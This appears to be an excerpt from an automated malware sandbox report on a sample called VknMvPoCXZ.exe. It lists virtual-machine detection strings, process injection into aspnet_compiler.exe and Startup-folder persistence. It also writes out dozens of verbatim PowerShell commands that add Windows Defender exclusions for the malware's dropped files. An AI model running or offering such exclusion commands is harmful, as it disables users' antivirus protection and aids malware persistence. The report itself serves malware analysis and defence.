                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm"SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareW_MATVN9Win32_VideoControllerHOLHWM8BVideoController120060621000000.000000-00029545192display.infMSBDAT374VDSOPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsR8CMBEKU
                      Source: svchost.exe, 00000004.00000002.565151015.0000028D9A45F000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm&C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000004.00000002.564749589.0000028D9A449000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000008.00000002.551410688.0000017E86402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: svchost.exe, 00000004.00000002.557362596.0000028D94C24000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@aF
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm'C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: svchost.exe, 00000008.00000002.551595749.0000017E86429000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.561851061.000002BA27C67000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.557866132.000002A146A2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeCode function: 1_2_024C6AD8 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 438000
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 43A000
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: CF7008
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
